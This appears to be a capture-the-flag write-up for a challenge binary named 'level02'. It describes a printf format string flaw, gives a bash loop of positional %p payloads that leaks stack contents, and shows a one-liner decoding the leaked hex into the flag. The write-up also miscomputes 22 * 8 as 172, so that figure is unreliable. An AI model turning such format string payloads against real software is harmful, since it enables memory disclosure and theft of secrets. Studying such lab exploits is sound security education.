# Level 02

## Observations

1. At beginning of the program, the flag is loaded and written in a stack buffer.
2. After failing authentication, the program calls `printf(username)` without any format string. 

## Plan

We'll use printf lack of format string to use our own and have a direct access to the stack.  
By filling the username buffer with values like `%x` or `%p` we can read the stack with different formatings.  
Since the flag is written on the stack, we'll be able to read it.

**But** the username buffer is too small so we can't really read that far.  
We'll use a loop and `printf` positional arguments to display the stack as a list of addresses.

## Payload

```bash
for i in {1..30}; do ./level02 < <(echo "$i - %$i\$p") | grep 0x; done

[...]
22 - 0x756e505234376848 does not have access!
23 - 0x45414a3561733951 does not have access!
24 - 0x377a7143574e6758 does not have access!
25 - 0x354a35686e475873 does not have access!
26 - 0x48336750664b394d does not have access!
[...]
```

What this tells us is that around `(22 * 8)` = *172* bytes deep in the stack there are some values that "look" like a string.  
Now we just need to concatenate and decode those hexadecimals value to turn them into a string.  
Starting at the end because of little endian, as usual.

```bash
echo '0x48336750664b394d0x354a35686e4758730x377a7143574e67580x45414a35617339510x756e505234376848' | xxd -r -p | rev
```
